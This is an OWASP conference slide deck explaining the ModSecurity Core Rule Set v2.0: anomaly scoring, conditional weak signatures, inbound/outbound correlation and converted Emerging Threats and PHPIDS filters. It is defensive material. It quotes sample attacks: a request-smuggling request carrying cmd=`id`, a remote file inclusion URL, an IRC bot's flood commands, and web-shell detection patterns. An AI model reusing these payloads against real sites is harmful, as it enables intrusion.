ModSecurity Core Rule Set (CRS) v2.0 AppSec DC Ryan Barnett OWASP Project Leader Director of Application Security Research, Breach Security [email protected] Copyright © The OWASP Foundation Permission is granted to.
ModSecurity
Core Rule Set (CRS)
v2.0
AppSec DC
Ryan Barnett
OWASP Project Leader
Director of Application Security Research,
Breach Security
[email protected]
Copyright © The OWASP Foundation
Permission is granted to copy, distribute and/or modify this document
under the terms of the OWASP License.
The OWASP Foundation
http://www.owasp.org/
About The Speaker
Community Participation:
OWASP ModSecurity Core Rule Set
Project Leader
Web Application Security Consortium
(WASC) Board Member
WASC Distributed Open Proxy
Honeypot Project Leader
Day Job:
Director of Application Security
Research, Breach Security
In charge of security research through
Breach Security Labs, development of
ModSecurity rules and signatures.
What are we going to talk about
ModSecurity Quick Overview
The Core Rule Set (CRS) Overview
Basic Detection Categories
CRS v2.0 Improvements
Facilitating Community Collaboration
Call for Community Help
What is ModSecurity?
It is an open source web application firewall (WAF)
module for Apache web servers
www.modsecurity.org
Separate Rule and Audit Engines
Allows full request/response HTTP logging capability
Deep understanding of HTTP and HTML
Robust Parsing (form encoding, multipart and XML)
Anti Evasion Features (normalization functions)
Supports Complex Rules Language
Advanced Capabilities
Transactional and Persistent Collections
Content Injection
Lua API
ModSecurity’s Apache Request Cycle Hooks
ModSecurity’s Rules Language
It's a simple event-based programming language.
Five processing phases, one for each major processing step.
Look at any part of the transaction.
Transform data to counter evasion.
Combine rules to form complex logic.
Common tasks are easy (the Core Rule Set), complex tasks are possible (Virtual Patching).
ModSecurity’s Rules Language Syntax
SecRule TARGETS OPERATOR [ACTIONS]
TARGETS tells ModSecurity where to look (such as ARGS, ARGS_NAMES or COOKIES).
OPERATOR tells ModSecurity how to process data (such as @rx, @pm or @gt).
ACTIONS tells ModSecurity what to do if a rule matches (such as deny, exec or setvar).
CRS v2.0 Overview
What is the Core Rule Set (CRS)?
A generic, plug-n-play set of WAF rules
Detection Mechanisms:
Protocol Validation
Malicious Client Identification
Generic Attack Signatures
Known Vulnerabilities Signatures
Trojan/Backdoor Access
Outbound Data Leakage
Anti-Virus and DoS utility scripts
OWASP Project Homepage
http://www.owasp.org/index.php/Category:OWASP_ModSecurity_Core_Rule_Set_Project
Who uses the CRS?
WASC Distributed Open Proxy Honeypot Project
“Use one of the web attacker's most trusted tools against
him - the Open Proxy server. Instead of being the target of
the attacks, we opt to be used as a conduit of the attack
data in order to gather our intelligence”
http://projects.webappsec.org/Distributed-Open-Proxy-Honeypots
Who uses the CRS?
Akamai WAF-in-the-Cloud Service
Converted CRS in Akamai Edge Servers
Launched in November 2009
[Diagram: Attacker -> Akamai EdgePlatform with WAF -> Origin Server]
Example Detection Categories
Detection Mechanisms: Protocol Violations
Protocol vulnerabilities such as Response Splitting,
Request Smuggling, Premature URL ending
Content length only for non GET/HEAD methods
Non ASCII characters or encoding in headers
Valid use of headers (for example, content length is numerical)
Proxy Access
modsecurity_crs_20_protocol_violations.conf
Attack requests are different due to automation
Missing headers such as Host, Accept, User-Agent
Host is an IP address (common worm propagation method)
modsecurity_crs_21_protocol_anomalies.conf
HTTP Request Smuggling Example
Goal: IDS/IPS will only see one POST request to /foobar.html

POST http://SITE/foobar.html HTTP/1.1
...
Content-Length: 0
Content-Length: 44

GET /cgi-bin/foo.php?cmd=`id` HTTP/1.1
Host: SITE

What the IDS/IPS sees:
1. /foobar.html
What the server sees:
1. /foobar.html
2. /foo.php
CRS ID 950012 – Request Smuggling Attack
POST /SITE/foobar.html HTTP/1.1
Host: www.badstore.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Content-Length: 0, 44

Apache collapses duplicate request headers and separates the payloads with commas – this payload means there were two Content-Length headers. The Request Smuggling rule looks for a comma in the appropriate request header payloads.

# HTTP Request Smuggling
SecRule REQUEST_HEADERS:'/(Content-Length|Transfer-Encoding)/' "," \
    "phase:2,t:none,block,nolog,auditlog,status:400,msg:'HTTP Request Smuggling Attack.',id:'950012',tag:'WEB_ATTACK/REQUEST_SMUGGLING',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.web_attack_score=+1,setvar:tx.%{rule.id}-WEB_ATTACK/REQUEST_SMUGGLING-%{matched_var_name}=%{matched_var}"
Detection Mechanisms: Protocol Policies
Policy is usually application specific
Some restrictions can usually be applied generically
White lists can be built for specific environments
Limitations on Sizes
Request size, Upload size
# of parameters, length of parameter
modsecurity_crs_23_request_limits.conf
Items that can be allowed or restricted
Methods - Allow or restrict WebDAV, block abused methods
such as CONNECT, TRACE or DEBUG
File extensions – backup files, database files, ini files
Content-Types (and to some extent other headers)
modsecurity_crs_30_http_policy.conf
CRS ID 960012 – Request Method Not Allowed
PUT /tr.htm HTTP/1.0
Accept-Language: pt-br, en-us;q=0.5
Translate: f
Content-Length: 67
Date: Thu, 5 Nov 2009 04:26:22 GMT
Connection: Keep-Alive
User-Agent: Microsoft Data Access Internet Publishing Provider DAV 1.1
Host: www.example.com

Command Tribulation was here www.commandt.org - Jesus Loves you

SecRule REQUEST_METHOD "!^((?:(?:POS|GE)T|OPTIONS|HEAD))$" \
    "phase:2,t:none,block,nolog,auditlog,status:501,msg:'Method is not allowed by policy',severity:'2',id:'960032',tag:'POLICY/METHOD_NOT_ALLOWED',setvar:tx.anomaly_score=+5,setvar:tx.policy_score=+1,setvar:tx.%{rule.id}-POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}"
Detection Mechanisms: Malicious Clients
Not aimed against targeted attacks, but against general
malicious internet activity
Offloads a lot of cyberspace junk & noise
Effective against comment spam
Reduce event count
Detection of Malicious Robots
Unique request attributes: User-Agent header, URL, Headers
Black list of IP addresses
Rate based detection
Detection of security scanners
Blocking can confuse security testing software (WAFW00f)
modsecurity_crs_35_bad_robots.conf
Comment SPAM – RBL Lookups
SecRule &IP:SPAMMER "@eq 0" \
    "chain,phase:1,t:none,block,nolog,auditlog,msg:'RBL Match for SPAM Source',tag:'AUTOMATION/MALICIOUS',severity:'2',skipAfter:END_RBL_CHECK"
    SecRule REMOTE_ADDR "@rbl sbl-xbl.spamhaus.org" \
        "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.automation_score=+1,setvar:tx.anomaly_score=+20,setvar:'tx.%{rule.id}=%{matched_var_name}=%{matched_var}',setvar:ip.spammer=1,expirevar:ip.spammer=86400"
Detection Mechanisms: App Layer Attacks
Detect application level attacks such as those described
in the OWASP top 10
SQL injection and blind SQL injection
Cross site scripting (XSS)
OS command injection and remote command access
Remote file inclusion
modsecurity_crs_40_generic_attacks.conf
modsecurity_crs_41_sql_injection_attacks.conf
modsecurity_crs_41_xss_attacks.conf
Remote File Inclusion (RFI) Example
GET /XXXXXXXX.php?ADODB_DIR=http://www.filmbox.ru/d.pl? HTTP/1.1
TE: deflate,gzip;q=0.3
Connection: TE, close
Host: XXXXXXXXXXX
User-Agent: libwww-perl/5.805

Annotations on the request: known vulnerable parameter (ADODB_DIR); one or more question marks at the end of the included URL; the included host does not match the Host header.

IP address in hostname:
SecRule ARGS "^(?:ht|f)tps?:\/\/([\d\.]+)" \

Remote URL passed to include():
SecRule ARGS "(?:\binclude\s*\([^)]*(ht|f)tps?:\/\/)" \

One or more question marks at the end:
SecRule ARGS "(?:ft|htt)ps?.*\?+$" \

Domain mismatch (chained rule):
SecRule ARGS "^(?:ht|f)tps?://(.*)\?$" \
    "chain,
    SecRule TX:1 "!@beginsWith %{request_headers.host}"

Contents of the remotely included file (an IRC bot); the slide brackets the cases as Control Methods and Attack Methods:
switch(substr($mcmd[0],1))
{
    // Control Methods
    case "restart":
    case "mail": //mail to from subject message
    case "dns":
    case "info":
    case "cmd":
    case "rndnick":
    case "php":
    case "exec": break;
    case "pscan": // .pscan 127.0.0.1 6667
    case "ud.server": // .udserver <server> <port>
    case "download":
    case "die":
    // Attack Methods
    case "udpflood":
    case "udpflood1":
    case "tcpflood":
    case "massmail":
Detection Mechanisms: Trojans/Backdoors
Major problem in hosting environments
Uploading is allowed
Some sites may be secure while others not
Upload detection
Check uploading of files containing viruses (i.e. WORD docs)
util/modsec-clamscan.pl
Check uploading of http backdoor page
Access detection
Known signatures (x_key header)
Generic file management output (gid, uid, drwx, c:\)
modsecurity_crs_45_trojans.conf
CRS ID 950922 – Trojan File Access
SecRule RESPONSE_BODY "(?:<title>[^<]*?(?:\b(?:(?:c(?:ehennemden|gi-telnet)|gamma web shell)\b|imhabirligi phpftp)|(?:r(?:emote explorer|57shell)|aventis klasvayv|zehir)\b|\.::(?:news remote php shell injection::\.| rhtools\b)|ph(?:p(?:(?: commander|terminal)\b|remoteview)|vayv)|myshell)|\b(?:(?:(?:microsoft windows\b.{0,10}?\bversion\b.{0,20}?\(c\) copyright 1985.{0,10}?\bmicrosoft corp|ntdaddy v1\.9 - obzerve \| fux0r inc)\.|(?:www\.sanalteror\.org - indexer and read|haxplor)er|php(?:konsole|shell)|c99shell)\b|aventgrup\.<br>|drwxr))" \
    "phase:4,t:none,ctl:auditLogParts=+E,block,nolog,auditlog,status:404,msg:'Backdoor access',id:'950922',tag:'MALICIOUS_SOFTWARE/TROJAN',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.trojan_score=+1,setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}-MALICIOUS_SOFTWARE/TROJAN-%{matched_var_name}=%{matched_var}"
Detection Mechanisms: Information Leakage
Monitoring outbound application data
HTTP Error Response Status Codes
SQL Information Leakage
Stack Dumps
Source Code Leakage
Last line of defense if all else fails
Provide feedback to application developers
Important for customer experience
Makes life for the hacker harder (if blocking is used)
modsecurity_crs_50_outbound.conf
CRS ID 971094 – SQL Information Leakage
SecRule RESPONSE_BODY "\bYou have an error in your SQL syntax near \'" \
    "phase:4,t:none,ctl:auditLogParts=+E,block,nolog,auditlog,status:500,msg:'SQL Information Leakage',id:'971094',tag:'LEAKAGE/ERRORS',severity:'3',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+15,setvar:tx.%{rule.id}-LEAKAGE/ERRORS-%{matched_var_name}=%{matched_var}"
CRS v2.0 Improvements
CRS V2.0 Improvements
Rules and Alert Management
Collaborative Rules/Anomaly Scoring
Conditional Rules (Weak Signatures)
Inbound+Outbound Correlation
Updated Severity Ratings
Increased Security Coverage
XSS Improvements
Converted Emerging Threats Web Attack Signatures
Converted PHPIDS Filters
Facilitate Community Collaboration
CRS Smoketest/Demo Page
JIRA Bug Tracking
Rules and Alert Management
CRS <2.0 – Self Contained Rules Concept
Older (<2.0) CRS used individual, “self-contained”
actions in rules
If a rule triggered, it would either deny or pass and log
No intelligence was shared between rules
Not optimal from a rules management perspective
(handling false positives/exceptions)
Editing the regex could blow it up
Heavily customized rules were less likely to be updated by
the user
Not optimal from a security perspective
Not every site had the same risk tolerance
Lower severity alerts were largely ignored
CRS 2.0 - Collaborative Rules/Anomaly Scoring
Rules logic has changed by decoupling the
inspection/detection from the blocking functionality
Rules set transactional variables (tx) to store meta-data
about the rule match
Rules also increase anomaly scores for both the attack
category and global score
These rules are considered basic or reference events
They do not generate an event in the Apache
error_log on their own by default
The anomaly score check/enforcement rules decide whether or not to deny/log events
modsecurity_crs_49_enforcement.conf
CRS 2.0 - Collaborative Rules/Anomaly Scoring
Example HTTP Parameter Pollution (HPP) attack
/index.aspx?page=select 1&page=2,3 from table where
id=1
#
# HTTP Parameter Pollution
#
SecRule ARGS_NAMES ".*" \
    "chain,phase:2,t:none,nolog,auditlog,pass,capture,id:'950012',setvar:'tx.arg_name_%{tx.0}=+1',msg:'Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name.'"
    SecRule TX:/ARG_NAME_*/ "@gt 1" \
        "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+20,setvar:tx.web_attack_score=+1,setvar:tx.%{rule.id}-WEB_ATTACK/COMMAND_INJECTION-%{matched_var_name}=%{matched_var}"
CRS 2.0 – Debug Log View
[4] Executing operator "gt" with param "1" against TX:arg_name_page.
[9] Target value: "2"
[4] Operator completed in 5 usec.
[9] Setting variable: tx.msg=%{rule.msg}
[9] Resolved macro %{rule.msg} to "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name."
[9] Set variable "tx.msg" to "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name.".
[9] Setting variable: tx.anomaly_score=+20
[9] Recorded original collection variable: tx.anomaly_score = "0"
[9] Relative change: anomaly_score=0+20
[9] Set variable "tx.anomaly_score" to "20".
[9] Setting variable: tx.web_attack_score=+1
[9] Recorded original collection variable: tx.web_attack_score = "0"
[9] Relative change: web_attack_score=0+1
[9] Set variable "tx.web_attack_score" to "1".
[9] Setting variable: tx.%{rule.id}-WEB_ATTACK/COMMAND_INJECTION%{matched_var_name}=%{matched_var}
[9] Resolved macro %{rule.id} to "950012"
[9] Resolved macro %{matched_var_name} to "TX:arg_name_page"
[9] Resolved macro %{matched_var} to "3"
[9] Set variable "tx.950012-WEB_ATTACK/COMMAND_INJECTION-TX:arg_name_page" to "2".
[4] Warning. Operator GT matched 1 at TX:arg_name_page. [file "/usr/local/apache/conf/modsecuritycrs_2.0.3/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "28"] [msg "Possible HTTP Parameter Pollution Attack: Multiple Parameters with the same Name."]
CRS 2.0 – Inspecting Anomaly Scores
# Alert on SQL Injection anomalies
#
#SecRule TX:SQLI_SCORE "@gt 0" \
#    "phase:2,t:none,log,deny,msg:'SQL Injection Detected (score %{TX.SQLI_SCORE}): %{tx.msg}'"

# Alert and Deny on High Anomaly Scores
#
SecRule TX:ANOMALY_SCORE "@ge 20" \
    "phase:2,t:none,nolog,auditlog,deny,msg:'Anomaly Score Exceeded (score %{TX.ANOMALY_SCORE}): %{tx.msg}',setvar:tx.inbound_tx_msg=%{tx.msg}"
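An added Python model of the collaborative scoring flow above (example code, not CRS or ModSecurity code): the reference rules for request smuggling and HTTP Parameter Pollution only record tx metadata and raise scores, and a separate enforcement check applies the @ge 20 threshold. The tx variable names follow the rules quoted on this page; the sample requests are constructed.

```python
from collections import Counter
from urllib.parse import parse_qsl

ANOMALY_THRESHOLD = 20  # the "@ge 20" in the enforcement rule above


def collapse_headers(raw_headers):
    """Apache-style header collapse: a header name seen more than once
    ends up as one header whose values are joined with ", "."""
    merged = {}
    for name, value in raw_headers:
        key = name.lower()
        merged[key] = value if key not in merged else merged[key] + ", " + value
    return merged


def rule_950012(tx, headers):
    """Reference rule (id 950012 on the page): a comma in Content-Length or
    Transfer-Encoding means the request carried that header more than once."""
    for name in ("content-length", "transfer-encoding"):
        value = headers.get(name, "")
        if "," in value:
            tx["msg"] = "HTTP Request Smuggling Attack."
            tx["anomaly_score"] += 20
            tx["web_attack_score"] += 1
            tx["950012-WEB_ATTACK/REQUEST_SMUGGLING-REQUEST_HEADERS:" + name] = value


def rule_hpp(tx, query_string):
    """Reference rule for HPP: count each ARGS_NAMES occurrence into
    tx.arg_name_<name>, then flag any count above 1 (the "@gt 1" check)."""
    counts = Counter(n for n, _ in parse_qsl(query_string, keep_blank_values=True))
    for name, n in counts.items():
        tx["arg_name_" + name] = n
        if n > 1:
            tx["msg"] = ("Possible HTTP Parameter Pollution Attack: "
                         "Multiple Parameters with the same Name.")
            tx["anomaly_score"] += 20
            tx["web_attack_score"] += 1
            tx["950012-WEB_ATTACK/COMMAND_INJECTION-TX:arg_name_" + name] = str(n)


def enforce(tx):
    """The decoupled enforcement check (49_enforcement): reference rules
    never block on their own; only the aggregate score decides."""
    if tx["anomaly_score"] >= ANOMALY_THRESHOLD:
        tx["inbound_tx_msg"] = tx["msg"]
        return ("deny", "Anomaly Score Exceeded (score %d): %s"
                % (tx["anomaly_score"], tx["msg"]))
    return ("pass", "")


def inspect(raw_headers, query_string):
    """Run the reference rules, then enforcement; return (tx, verdict)."""
    tx = {"msg": "", "anomaly_score": 0, "web_attack_score": 0}
    rule_950012(tx, collapse_headers(raw_headers))
    rule_hpp(tx, query_string)
    return tx, enforce(tx)


# Constructed sample requests (not captures from the page).
SMUGGLED = [("Host", "www.example.com"), ("Content-Length", "0"), ("Content-Length", "44")]
CLEAN = [("Host", "www.example.com"), ("Content-Length", "12")]
HPP_QUERY = "page=select 1&page=2,3 from table where id=1"  # the HPP query from the slide

if __name__ == "__main__":
    for headers, query in ((SMUGGLED, ""), (CLEAN, HPP_QUERY), (CLEAN, "page=1")):
        tx, verdict = inspect(headers, query)
        print(verdict[0], tx["anomaly_score"], verdict[1])
```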
CRS 2.0 – Conditional Rules (Weak Sigs)
SQL Injection Example
Aggregate indicators to determine an attack
Strong indicators
Keywords such as: xp_cmdshell, varchar,
Sequences such as: union …. select, select … top … 1
Amount: script, cookie and document appear in the
same input field
Weak indicators – meta-characters
--, ;, ', …
CRS only applies weak signatures in the event a
stronger signature has previously triggered
CRS 2.0 – Conditional Rule Example
SecMarker BEGIN_SQL_INJECTION_WEAK
SecRule &TX:/SQL_INJECTION/ "@eq 0" \
    "phase:2,t:none,nolog,pass,skipAfter:END_SQL_INJECTION_WEAK"
SecRule TX:/SQL_INJECTION/ "\b(?:rel(?:(?:nam|typ)e|kind)|a(?:ttn(?:ame|um)|scii)|c(?:o(?:nver|un)t|ha?r)|s(?:hutdown|elect)|to_(?:numbe|cha)r|u(?:pdate|nion)|d(?:elete|rop)|group\b\W*\bby|having|insert|length|where)\b" \
    "phase:2,chain,capture,t:none,ctl:auditLogParts=+E,block,nolog,auditlog,msg:'SQL Injection Attack',id:'950001',tag:'WEB_ATTACK/SQL_INJECTION',logdata:'%{TX.0}',severity:'2'"
    SecRule MATCHED_VAR "(?:[\\\(\)\%#]|--)" \
        "t:none,setvar:'tx.msg=%{rule.msg}',setvar:tx.sqli_score=+1,setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}"
SecMarker END_SQL_INJECTION_WEAK
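An added Python model of the conditional weak-signature block above (example code, not CRS code): a stronger signature must first leave a TX variable whose name contains SQL_INJECTION, otherwise the weak block is skipped; when it runs, rule 950001 re-inspects the saved payloads and scores only a keyword that co-occurs with a meta-character. The keyword and meta-character regexes are the ones on the page; the strong signatures, inputs and the "union_select" label are constructed.

```python
import re

# Stronger signatures that run before the weak block. Constructed stand-ins:
# the first is the ";drop" pattern from the 959001 event quoted on this page,
# the second models the "union ... select" sequence the slide calls a strong indicator.
STRONG_SIGS = {
    "959001": re.compile(r";\W*?\bdrop\b"),
    "union_select": re.compile(r"\bunion\b.{0,100}?\bselect\b"),  # label is constructed
}
# Keyword list of rule 950001 and its chained MATCHED_VAR meta-character check.
KEYWORDS = re.compile(
    r"\b(?:rel(?:(?:nam|typ)e|kind)|a(?:ttn(?:ame|um)|scii)|c(?:o(?:nver|un)t|ha?r)"
    r"|s(?:hutdown|elect)|to_(?:numbe|cha)r|u(?:pdate|nion)|d(?:elete|rop)"
    r"|group\b\W*\bby|having|insert|length|where)\b")
METACHARS = re.compile(r"(?:[\\()%#]|--)")


def strong_rules(tx, args):
    """Each strong hit stores the matched payload under a TX name containing
    SQL_INJECTION; that name is what the weak block later looks for."""
    for arg, value in args.items():
        for rule_id, pat in STRONG_SIGS.items():
            if pat.search(value):
                tx["msg"] = "SQL Injection Attack"
                tx["sqli_score"] += 1
                tx["anomaly_score"] += 20
                tx["%s-WEB_ATTACK/SQL_INJECTION-ARGS:%s" % (rule_id, arg)] = value


def weak_block(tx):
    """BEGIN/END_SQL_INJECTION_WEAK: skipped when &TX:/SQL_INJECTION/ is 0.
    Otherwise 950001 runs over the saved payloads, and only a keyword plus a
    meta-character in the same payload raises the scores."""
    saved = {k: v for k, v in tx.items() if "SQL_INJECTION" in k}
    if not saved:
        return "skipped"
    for var_name, payload in saved.items():
        if KEYWORDS.search(payload) and METACHARS.search(payload):
            tx["sqli_score"] += 1
            tx["anomaly_score"] += 20
            tx["950001-WEB_ATTACK/SQL_INJECTION-TX:%s" % var_name] = payload
    return "applied"


def inspect(args):
    tx = {"msg": "", "sqli_score": 0, "anomaly_score": 0}
    strong_rules(tx, args)
    return tx, weak_block(tx)


# Constructed inputs, lowercase because the rule above runs with t:none only.
CASES = {
    "strong+weak": {"id": "1; drop table users--"},
    "strong only": {"id": "1 union select password from users"},
    "weak only": {"q": "select (a) where x"},
}

if __name__ == "__main__":
    for label, args in CASES.items():
        tx, outcome = inspect(args)
        print(label, outcome, tx["sqli_score"], tx["anomaly_score"])
```

The "weak only" case shows the point of the marker block: keywords and a meta-character in an ordinary query add nothing unless a stronger signature has already fired.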
CRS 2.0 – Inbound/Outbound Correlation
Concept is to do post processing of the transactional
data (in the logging phase) for event creation
modsecurity_crs_60_correlation.conf
Couple the inbound with the outbound for increased
intelligence
Was there an inbound attack?
Was there an HTTP Status Code Error (4xx/5xx level)?
Was there an application information leak?
Correlation facilitates better incident response
App error without inbound attack -> Contact Ops
Inbound attack + outbound error -> Contact Security
CRS 2.0 – Updated Severity Ratings
Correlated Events
0: Emergency - is generated from correlation (inbound attack +
outbound leakage)
1: Alert - is generated from correlation (inbound attack + outbound
application level error)
Non-Correlated Events
2: Critical - highest severity level possible without correlation. It is
normally generated by the web attack rules (40 level files)
3: Error - is generated from outbound leakage rules (50 level files)
4: Warning - is generated by malicious client rules (35 level files)
5: Notice - is generated by the Protocol policy and anomaly files
6: Info - is generated by the search engine clients (55 marketing
file)
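An added Python model of the logging-phase correlation and the severity table above (example code, not CRS code): the outbound leakage rules quoted on this page add 15 to the anomaly score, and correlation then combines the inbound verdict with the response status and leakage to pick the severity and who to contact. The response bodies are constructed; routing of a leak without an inbound attack is an assumption noted in the code.

```python
import re

# Outbound leakage patterns from the 50_outbound rules quoted on this page.
LEAK_RULES = {
    "971094": re.compile(r"\bYou have an error in your SQL syntax near '"),
    "971156": re.compile(r"\bsupplied argument is not a valid MySQL\b"),
}

# Severity levels from the slide.
SEVERITY = {0: "EMERGENCY", 1: "ALERT", 2: "CRITICAL", 3: "ERROR"}


def outbound_rules(tx, response_body):
    """Phase 4 reference rules: record the leak and add 15 to the anomaly score."""
    for rule_id, pat in LEAK_RULES.items():
        if pat.search(response_body):
            tx["anomaly_score"] += 15
            tx["outbound_tx_msg"] = "SQL Information Leakage"
            tx["%s-LEAKAGE/ERRORS-RESPONSE_BODY" % rule_id] = pat.pattern
            return True
    return False


def correlate(tx, status):
    """Post-processing of the transaction (the 60_correlation idea).
    Returns (severity level or None, severity name, who to contact, message)."""
    inbound = tx.get("inbound_tx_msg")   # left behind by the inbound enforcement rule
    leak = tx.get("outbound_tx_msg")
    app_error = 400 <= status <= 599
    score = tx["anomaly_score"]
    if inbound and leak:
        return (0, SEVERITY[0], "Contact Security",
                "Correlated Successful Attack Identified: Inbound Attack (%s) + "
                "Outbound Data Leakage (%s) - (Transactional Anomaly Score: %d)"
                % (inbound, leak, score))
    if inbound and app_error:
        return (1, SEVERITY[1], "Contact Security",
                "Correlated Attack Attempt Identified: Inbound Attack (%s) + "
                "Outbound Application Error (HTTP %d)" % (inbound, status))
    if inbound:
        return (2, SEVERITY[2], "Contact Security", inbound)
    if leak:  # leak with no inbound attack: routed like an app error (assumption)
        return (3, SEVERITY[3], "Contact Ops", leak)
    if app_error:
        return (None, "NONE", "Contact Ops",
                "Application error without inbound attack (HTTP %d)" % status)
    return (None, "NONE", "", "")


# Constructed response bodies.
LEAKY_BODY = ("<b>Warning</b>: mysql_fetch_array(): supplied argument is not a valid "
              "MySQL result resource in /var/www/list.php on line 42")
CLEAN_BODY = "<html><body>No results found.</body></html>"


def run(inbound_msg, inbound_score, status, body):
    """Rebuild the tx state the inbound phase leaves, then run outbound + correlation."""
    tx = {"anomaly_score": inbound_score}
    if inbound_msg:
        tx["inbound_tx_msg"] = inbound_msg
    outbound_rules(tx, body)
    return tx, correlate(tx, status)


if __name__ == "__main__":
    print(run("SQL Injection Attack Detected", 55, 200, LEAKY_BODY)[1])
    print(run("SQL Injection Attack Detected", 55, 500, CLEAN_BODY)[1])
    print(run(None, 0, 500, CLEAN_BODY)[1])
```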
CRS 2.0 – Correlated Event Messages
Message: Pattern match "\;\W*?\bdrop\b" at TX:pm_sqli_data_REQUEST_URI. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "262"] [id "959001"] [msg "SQL Injection Attack"] [data "; drop"] [severity "CRITICAL"] [tag "WEB_ATTACK/SQL_INJECTION"]
Message: Operator GE matched 0 at TX:anomaly_score. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_49_enforcement.conf"] [line "30"] [msg "Anomaly Score Exceeded (score 55): SQL Injection Attack Detected"]
Message: Pattern match "\bsupplied argument is not a valid MySQL\b" at RESPONSE_BODY. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_50_outbound.conf"] [line "259"] [id "971156"] [msg "SQL Information Leakage"] [severity "ERROR"] [tag "LEAKAGE/ERRORS"]
Message: Warning. Operator GE matched 1 at TX. [file "/opt/waschoneypot/etc/rules/base_rules/modsecurity_crs_60_correlation.conf"] [line "24"] [msg "Correlated Successful Attack Identified: Inbound Attack (SQL Injection Attack Detected) + Outbound Data Leakage (SQL Information Leakage) - (Transactional Anomaly Score: 85)"] [severity "EMERGENCY"]
Increased Security Coverage
CRS 2.0 – Updated XSS Coverage
Rules added that look for all event handlers from the WASC
Script Mapping Project
http://projects.webappsec.org/Script-Mapping
CRS 2.0 – Converted Emerging Threats Rules
Breach Security Labs received authorization from ET to
convert their Snort rules and include them in the CRS
http://www.emergingthreats.net/
Converted the following rule files
emerging-web_server.rules
emerging-web_specific_apps.rules
Identifying attacks against known vulnerabilities does
have value
Raised threat level
If done correctly, lessens false positives
CRS combines the what of our generic attack payload
detection with the where of ET known vuln data
CRS 2.0 – Converted Emerging Threats Rules
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:"ET WEB_SPECIFIC_APPS 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID SELECT"; flow:established,to_server; uricontent:"/vehiclelistings.asp?"; nocase; uricontent:"vehicleID="; nocase; uricontent:"SELECT"; nocase; pcre:"/.+SELECT.+FROM/Ui"; classtype:web-application-attack; reference:cve,CVE-2006-6092; reference:url,www.securityfocus.com/bid/21154; reference:url,doc.emergingthreats.net/2007504; reference:url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SPECIFIC_APPS/WEB_2020_Auto_gallery; sid:2007504; rev:5;)

Slide annotations: the uricontent checks give the attack vector location (URI + parameter); the PCRE is the weak signature.
CRS 2.0 – Converted Emerging Threats Rule
Slide annotations: the first rule verifies the URI of the request; the chained rule verifies that saved TX SQL Injection data exists for the attack vector location (ARGS:vehicleID).

# (sid 2007508) ET WEB_SPECIFIC 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID
SecRule REQUEST_URI_RAW "(?i:\/vehiclelistings\.asp)" \
    "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,ctl:auditLogParts=+E,nolog,auditlog,logdata:'%{TX.0}',id:sid2007508,rev:3,msg:'ET WEB_SPECIFIC 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID',tag:'web-application-attack',tag:'url,www.emergingthreats.net/cgi-bin/cvsweb.cgi/sigs/WEB_SQL_INJECTION/WEB_2020_Auto_gallery'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:vehicleID/' "@gt 0" \
        "setvar:'tx.msg=ET WEB_SPECIFIC 20/20 Auto Gallery SQL Injection Attempt -- vehiclelistings.asp vehicleID',setvar:tx.sqli_score=+1,setvar:tx.anomaly_score=+20,setvar:tx.%{rule.id}-SQL_INJECTION/SQL_INJECTION-%{matched_var_name}=%{matched_var}"
CRS 2.0 – Converted PHPIDS Filters
http://phpids.net/
~70 regular expression rules to detect common attack
payloads
XSS
SQL Injection
RFI
Filters are heavily tested by the community and updated
frequently
Breach Security Labs received authorization from PHPIDS
to convert their default_filters.xml rules and include them
in the CRS
https://svn.php-ids.org/svn/trunk/lib/IDS/default_filter.xml
Thanks to Mario Heiderich
CRS 2.0 – PHPIDS Example Filter
<filter>
<id>1</id>
<rule><![CDATA[(?:"[^"]*[^]?>)|(?:[^\w\s]\s*\/>)|(?:>")]]></rule>
<description>finds html breaking injections
including whitespace attacks</description>
<tags>
<tag>xss</tag>
<tag>csrf</tag>
</tags>
<impact>4</impact>
</filter>
CRS 2.0 – Converted PHPIDS Example Filter
Combats common evasions with the multiMatch action
Normal process is to only apply the operator once after the transformation function chain
With multiMatch, the operator is applied before/after any transformation function that changes data

SecRule ARGS|ARGS_NAMES "(?:\"[^\"]*[^]?>)|(?:[^\w\s]\s*\/>)|(?:>\")" \
    "phase:2,capture,multiMatch,t:none,t:urlDecodeUni,t:cssDecode,t:jsDecode,t:htmlEntityDecode,t:replaceComments,t:compressWhiteSpace,t:lowercase,ctl:auditLogParts=+E,block,nolog,msg:'finds html breaking injections including whitespace attacks',id:'phpids1',tag:'WEB_ATTACK/XSS',tag:'WEB_ATTACK/CSRF',logdata:'%{TX.0}',severity:'2',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+4,setvar:tx.%{rule.id}-WEB_ATTACK/INJECTION%{rule.severity}-%{rule.msg}%{matched_var_name}=%{matched_var}"

